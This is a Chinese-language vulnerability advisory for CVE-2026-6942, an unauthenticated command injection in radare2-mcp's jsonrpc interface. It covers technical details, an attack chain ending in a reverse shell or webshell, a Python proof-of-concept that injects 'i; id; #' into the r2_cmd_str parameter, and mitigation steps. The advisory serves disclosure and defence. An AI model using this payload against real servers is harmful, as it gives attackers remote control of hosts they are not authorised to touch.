CVE-2026-6942 CVSS 9.8 严重

CVE-2026-6942 radare2-mcp 远程命令执行漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-6942

漏洞类型

操作系统命令注入

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

radare2-mcp

漏洞概述

radare2-mcp在1.6.0及更早版本中存在严重的操作系统命令注入漏洞。该漏洞源于程序未能正确过滤用户输入，允许攻击者通过jsonrpc接口参数注入恶意的shell元字符。无需任何身份验证，远程攻击者即可利用此漏洞绕过命令过滤器，在目标主机上执行任意系统命令，从而完全控制受影响系统，对机密性、完整性和可用性造成极高风险。

技术细节

该漏洞的核心在于radare2-mcp处理用户输入时的过滤机制存在缺陷。具体而言，`r2_cmd_str()` 函数在处理通过jsonrpc接口传入的参数时，未能对含有特殊含义的shell元字符（例如分号、管道符、反引号或命令替换符号 `$(...)` 等）进行严格的转义或过滤。攻击者可以利用这一缺陷，精心构造包含这些元字符的恶意JSON数据包并发送至服务器。当后端程序处理该请求并尝试调用底层系统命令时，注入的元字符将破坏原有的命令结构，导致攻击者追加的任意操作系统命令被Shell解释器执行。由于该服务接口默认无需认证即可访问，这使得任何能够连接到服务端的攻击者都能轻易获取服务器权限，造成极其严重的远程代码执行风险。

攻击链分析

STEP 1

侦察阶段

攻击者扫描互联网或内网，寻找开放了radare2-mcp服务（默认端口）的目标主机。

STEP 2

漏洞利用

攻击者向目标的jsonrpc接口发送特制的POST请求，该请求包含调用`r2_cmd_str`方法的参数，参数中混入了用于命令注入的Shell元字符（如 `;` 或 `$(cmd)`）。

STEP 3

命令执行

radare2-mcp后端在处理该请求时，未能过滤恶意字符，直接将其传递给系统Shell执行，导致攻击者注入的任意命令在服务器上运行。

STEP 4

建立控制

攻击者利用执行的命令反弹Shell或写入Webshell，从而获得目标主机的完整控制权限。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL (replace with actual host)
target_url = "http://localhost:port/jsonrpc"

# Malicious payload injecting shell metacharacters
# Example: executing 'id' command after the intended command
payload = {
    "jsonrpc": "2.0",
    "method": "r2_cmd_str",
    "params": ["i; id; #"], 
    "id": 1
}

try:
    # Send the malicious request
    response = requests.post(target_url, json=payload)
    
    # Output the result
    print(f"Status Code: {response.status_code}")
    print(f"Response Body: {response.text}")
    
    # Check if command execution was successful (indicators may vary)
    if "uid=" in response.text or "gid=" in response.text:
        print("[+] Potential RCE successful!")
    else:
        print("[-] Exploit may have failed or output format differs.")
        
except Exception as e:
    print(f"Error connecting to target: {e}")

影响范围

radare2-mcp <= 1.6.0

防御指南

临时缓解措施

建议立即将radare2-mcp升级至最新版本以修复此漏洞。若无法立即升级，应限制对服务端口的网络访问，仅允许可信IP连接，或部署Web应用防火墙（WAF）以拦截包含常见Shell元字符的恶意请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表